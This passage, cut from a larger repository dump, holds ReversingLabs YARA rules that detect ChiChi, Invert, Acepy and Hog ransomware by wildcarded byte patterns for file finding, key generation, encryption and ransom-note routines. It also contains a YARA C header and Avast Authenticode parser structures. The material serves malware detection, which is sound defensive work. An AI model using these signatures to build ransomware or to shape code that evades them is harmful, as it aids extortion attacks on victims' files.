?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 | 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 29 | DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 30 | 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 2A 31 | } 32 | 33 | $find_files = { 34 | 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? 35 | ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0C 2B ?? 36 | 08 6F ?? ?? ?? ?? 0D 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 00 08 6F ?? ?? ?? ?? 2D ?? 37 | DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? 00 DC 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 38 ?? 38 | ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? 39 | ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? 40 | ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? 41 | ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 42 | 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 03 28 ?? ?? ?? ?? 00 00 00 43 | DE ?? 26 00 00 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A 44 | } 45 | 46 | $encrypt_files = { 47 | 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 06 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 48 | 6F ?? ?? ?? ?? 0B 07 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 00 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? 49 | ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F ?? ?? ?? 50 | ?? 00 7E ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A 51 | } 52 | 53 | condition: 54 | uint16(0) == 0x5A4D and 55 | ( 56 | $setup_attack 57 | ) and 58 | ( 59 | $find_files 60 | ) and 61 | ( 62 | $encrypt_files 63 | ) 64 | } -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.ChiChi.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Ransomware_ChiChi : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "CHICHI" 12 | description = "Yara rule that detects ChiChi ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "ChiChi" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $generate_key = { 21 | 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? 22 | 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 8B 7D ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 85 23 | FF 75 ?? 33 F6 EB ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 6A ?? 8D 4D ?? C7 45 24 | ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 56 8D 25 | 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 85 C0 74 26 | ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 03 8B CB 57 56 FF 50 ?? C7 45 ?? ?? ?? ?? ?? 85 F6 27 | 74 ?? 83 FF ?? 8D 45 ?? 8D 4D ?? 8B FE 0F 46 C8 32 C0 56 8B 09 F3 AA E8 ?? ?? ?? ?? 28 | 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 29 | } 30 | 31 | $encrypt_files = { 32 | 55 8B EC 51 53 56 57 8B D9 68 ?? ?? ?? ?? 53 89 5D ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? 33 | ?? ?? 53 FF D6 68 ?? ?? ?? ?? 8B F8 FF D6 8B 1D ?? ?? ?? ?? 03 F8 03 FF 83 C7 ?? 57 34 | 6A ?? FF 35 ?? ?? ?? ?? FF D3 8B F0 85 F6 74 ?? 8B 7D ?? 57 56 FF 15 ?? ?? ?? ?? 68 35 | ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5B 36 | 8B E5 5D C3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? 37 | ?? 56 6A ?? FF 35 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B CF E8 ?? ?? 38 | ?? ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 39 | } 40 | 41 | $find_files = { 42 | 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? 43 | ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 44 | D7 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 45 | ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 FF B6 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? 46 | ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? FF 74 24 ?? 8B 74 24 ?? 47 | 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ?? 48 | ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? 49 | ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 E8 ?? 78 ?? 66 83 50 | 7C 44 ?? ?? 74 ?? 83 E8 ?? 79 ?? EB ?? 8D 74 24 ?? 8D 34 46 68 ?? ?? ?? ?? 56 FF 15 51 | ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 52 | ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 53 | } 54 | 55 | condition: 56 | uint16(0) == 0x5A4D and 57 | ( 58 | $find_files 59 | ) and 60 | ( 61 | $generate_key 62 | ) and 63 | ( 64 | $encrypt_files 65 | ) 66 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Invert.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Invert : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "INVERT" 12 | description = "Yara rule that detects Invert ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Invert" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $encrypt_files = { 21 | 73 ?? ?? ?? ?? 0A 06 04 7D ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 25 2D 22 | ?? 26 06 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 0C 7D ?? ?? ?? ?? 08 7E ?? ?? ?? ?? 25 23 | 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? 24 | ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? 25 | ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 26 | ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? 27 | FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D 28 | ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 29 | 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? 30 | ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0D 00 00 09 03 28 ?? ?? 31 | ?? ?? 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 26 00 00 DE ?? 26 00 00 DE 32 | ?? 00 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 2A 33 | } 34 | 35 | $find_files = { 36 | 00 73 ?? ?? ?? ?? 0A 00 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17 37 | 72 ?? ?? ?? ?? A2 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 12 ?? 28 ?? 38 | ?? ?? ?? 0C 00 06 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE 39 | ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 06 40 | 0D 2B ?? 09 2A 41 | } 42 | 43 | $get_file_list = { 44 | 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 2C 45 | ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 38 ?? ?? 46 | ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 47 | 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 00 07 09 6F ?? ?? 48 | ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 49 | DC 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? 50 | ?? 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 51 | ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F 52 | ?? ?? ?? ?? 00 00 2A 53 | } 54 | 55 | condition: 56 | uint16(0) == 0x5A4D and 57 | ( 58 | $get_file_list 59 | ) and 60 | ( 61 | $find_files 62 | ) and 63 | ( 64 | $encrypt_files 65 | ) 66 | } -------------------------------------------------------------------------------- /src/lib/include/yara/unaligned.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2016. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_UNALIGNED_H 31 | #define YR_UNALIGNED_H 32 | 33 | #include 34 | 35 | #pragma pack(push) 36 | #pragma pack(1) 37 | 38 | typedef struct 39 | { 40 | uint16_t val; 41 | } uint16_una_t; 42 | 43 | typedef struct 44 | { 45 | uint32_t val; 46 | } uint32_una_t; 47 | 48 | typedef struct 49 | { 50 | uint64_t val; 51 | } uint64_una_t; 52 | 53 | typedef struct 54 | { 55 | int16_t val; 56 | } int16_una_t; 57 | 58 | typedef struct 59 | { 60 | int32_t val; 61 | } int32_una_t; 62 | 63 | typedef struct 64 | { 65 | int64_t val; 66 | } int64_una_t; 67 | 68 | typedef struct 69 | { 70 | char *val; 71 | } charp_una_t; 72 | 73 | #pragma pack(pop) 74 | 75 | static inline uint16_t yr_unaligned_u16(const void *ptr) 76 | { 77 | const uint16_una_t *tmp = (const uint16_una_t *) ptr; 78 | return tmp->val; 79 | } 80 | 81 | static inline uint32_t yr_unaligned_u32(const void *ptr) 82 | { 83 | const uint32_una_t *tmp = (const uint32_una_t *) ptr; 84 | return tmp->val; 85 | } 86 | 87 | static inline uint64_t yr_unaligned_u64(const void *ptr) 88 | { 89 | const uint64_una_t *tmp = (const uint64_una_t *) ptr; 90 | return tmp->val; 91 | } 92 | 93 | static inline uint16_t yr_unaligned_i16(const void *ptr) 94 | { 95 | const int16_una_t *tmp = (const int16_una_t *) ptr; 96 | return tmp->val; 97 | } 98 | 99 | static inline uint32_t yr_unaligned_i32(const void *ptr) 100 | { 101 | const int32_una_t *tmp = (const int32_una_t *) ptr; 102 | return tmp->val; 103 | } 104 | 105 | static inline uint64_t yr_unaligned_i64(const void *ptr) 106 | { 107 | const int64_una_t *tmp = (const int64_una_t *) ptr; 108 | return tmp->val; 109 | } 110 | 111 | static inline char *yr_unaligned_char_ptr(const void *ptr) 112 | { 113 | const charp_una_t *tmp = (const charp_una_t *) ptr; 114 | return tmp->val; 115 | } 116 | 117 | #endif 118 | -------------------------------------------------------------------------------- /src/lib/modules/pe/authenticode-parser/structs.c: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2021 Avast Software 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 20 | */ 21 | 22 | #include "structs.h" 23 | 24 | ASN1_CHOICE(SpcString) = { 25 | ASN1_IMP_OPT(SpcString, value.unicode, ASN1_BMPSTRING, 0), 26 | ASN1_IMP_OPT(SpcString, value.ascii, ASN1_IA5STRING, 1) 27 | } ASN1_CHOICE_END(SpcString) 28 | 29 | ASN1_SEQUENCE(SpcSerializedObject) = { 30 | ASN1_SIMPLE(SpcSerializedObject, classId, ASN1_OCTET_STRING), 31 | ASN1_SIMPLE(SpcSerializedObject, serializedData, ASN1_OCTET_STRING) 32 | } ASN1_SEQUENCE_END(SpcSerializedObject) 33 | 34 | ASN1_CHOICE(SpcLink) = { 35 | ASN1_IMP_OPT(SpcLink, value.url, ASN1_IA5STRING, 0), 36 | ASN1_IMP_OPT(SpcLink, value.moniker, SpcSerializedObject, 1), 37 | ASN1_EXP_OPT(SpcLink, value.file, SpcString, 2) 38 | } ASN1_CHOICE_END(SpcLink) 39 | 40 | ASN1_SEQUENCE(SpcAttributeTypeAndOptionalValue) = { 41 | ASN1_SIMPLE(SpcAttributeTypeAndOptionalValue, type, ASN1_OBJECT), 42 | ASN1_OPT(SpcAttributeTypeAndOptionalValue, value, ASN1_ANY) 43 | } ASN1_SEQUENCE_END(SpcAttributeTypeAndOptionalValue) 44 | 45 | ASN1_SEQUENCE(SpcPeImageData) = { 46 | ASN1_SIMPLE(SpcPeImageData, flags, ASN1_BIT_STRING), 47 | ASN1_EXP_OPT(SpcPeImageData, file, SpcLink, 0) 48 | } ASN1_SEQUENCE_END(SpcPeImageData) 49 | 50 | ASN1_SEQUENCE(AlgorithmIdentifier) = { 51 | ASN1_SIMPLE(AlgorithmIdentifier, algorithm, ASN1_OBJECT), 52 | ASN1_OPT(AlgorithmIdentifier, parameters, ASN1_ANY) 53 | } ASN1_SEQUENCE_END(AlgorithmIdentifier) 54 | 55 | ASN1_SEQUENCE(DigestInfo) = { 56 | ASN1_SIMPLE(DigestInfo, digestAlgorithm, AlgorithmIdentifier), 57 | ASN1_SIMPLE(DigestInfo, digest, ASN1_OCTET_STRING) 58 | } ASN1_SEQUENCE_END(DigestInfo) 59 | 60 | ASN1_SEQUENCE(SpcIndirectDataContent) = { 61 | ASN1_SIMPLE(SpcIndirectDataContent, data, SpcAttributeTypeAndOptionalValue), 62 | ASN1_SIMPLE(SpcIndirectDataContent, messageDigest, DigestInfo) 63 | } ASN1_SEQUENCE_END(SpcIndirectDataContent) 64 | 65 | ASN1_SEQUENCE(SpcSpOpusInfo) = { 66 | ASN1_EXP_OPT(SpcSpOpusInfo, programName, SpcString, 0), 67 | ASN1_EXP_OPT(SpcSpOpusInfo, moreInfo, SpcLink, 1) 68 | } ASN1_SEQUENCE_END(SpcSpOpusInfo) 69 | 70 | IMPLEMENT_ASN1_FUNCTIONS(SpcString) 71 | IMPLEMENT_ASN1_FUNCTIONS(SpcSerializedObject) 72 | IMPLEMENT_ASN1_FUNCTIONS(SpcLink) 73 | IMPLEMENT_ASN1_FUNCTIONS(SpcAttributeTypeAndOptionalValue) 74 | IMPLEMENT_ASN1_FUNCTIONS(SpcPeImageData) 75 | IMPLEMENT_ASN1_FUNCTIONS(AlgorithmIdentifier) 76 | IMPLEMENT_ASN1_FUNCTIONS(DigestInfo) 77 | IMPLEMENT_ASN1_FUNCTIONS(SpcIndirectDataContent) 78 | IMPLEMENT_ASN1_FUNCTIONS(SpcSpOpusInfo) 79 | -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.Acepy.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Ransomware_Acepy : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "ACEPY" 12 | description = "Yara rule that detects Acepy ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Acepy" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $find_files = { 21 | E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 22 | 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ?? 23 | 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ?? ?? 24 | 83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 25 | E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 26 | B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 27 | 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 28 | E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? 29 | ?? ?? B8 ?? ?? ?? ?? C9 C3 30 | } 31 | 32 | $encrypt_files = { 33 | 55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 34 | 89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? 35 | ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 36 | ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 37 | 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 40 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 38 | 89 45 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 39 | ?? B8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 39 C8 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? 40 | 8B 45 ?? 89 C1 40 89 45 ?? EB ?? 8B 45 ?? 8B 4D ?? 01 C1 8B 45 ?? 8B 55 ?? 01 C2 8B 41 | 45 ?? 50 89 4D ?? 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 31 D2 42 | F7 F1 8B 45 ?? 01 D0 8B 4D ?? 0F BE 09 0F BE 10 31 D1 8B 45 ?? 88 08 EB ?? B8 ?? ?? 43 | ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 B9 ?? ?? ?? ?? 51 50 E8 ?? 44 | ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? 45 | ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C9 C3 46 | } 47 | 48 | $drop_ransom_note = { 49 | 55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 | 89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? 51 | ?? ?? B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 50 B8 ?? ?? ?? ?? 50 B8 52 | ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? 53 | ?? ?? C9 C3 54 | } 55 | 56 | condition: 57 | uint16(0) == 0x5A4D and 58 | ( 59 | ( 60 | $find_files 61 | ) and 62 | ( 63 | $encrypt_files 64 | ) and 65 | ( 66 | $drop_ransom_note 67 | ) 68 | ) 69 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Hog.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Hog : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "HOG" 12 | description = "Yara rule that detects Hog ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Hog" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $generate_key = { 21 | 73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 1A 8D ?? ?? ?? ?? 0C 2B ?? 07 08 6F ?? ?? ?? ?? 08 22 | 16 28 ?? ?? ?? ?? 0D 06 72 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 5E 28 ?? ?? ?? 23 | ?? 6F ?? ?? ?? ?? 26 02 25 17 59 10 ?? 16 30 ?? 06 6F ?? ?? ?? ?? 13 ?? DE ?? 07 2C ?? 24 | 07 6F ?? ?? ?? ?? DC 11 ?? 2A 25 | } 26 | 27 | $find_files = { 28 | 16 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 16 16 6F ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 00 1F 29 | ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? 30 | ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 31 | 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ?? 32 | ?? ?? ?? 6F ?? ?? ?? ?? 17 31 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? 33 | ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 34 | 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F ?? 35 | ?? ?? ?? DC 28 ?? ?? ?? ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 26 28 ?? ?? ?? ?? 36 | DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 2A 37 | } 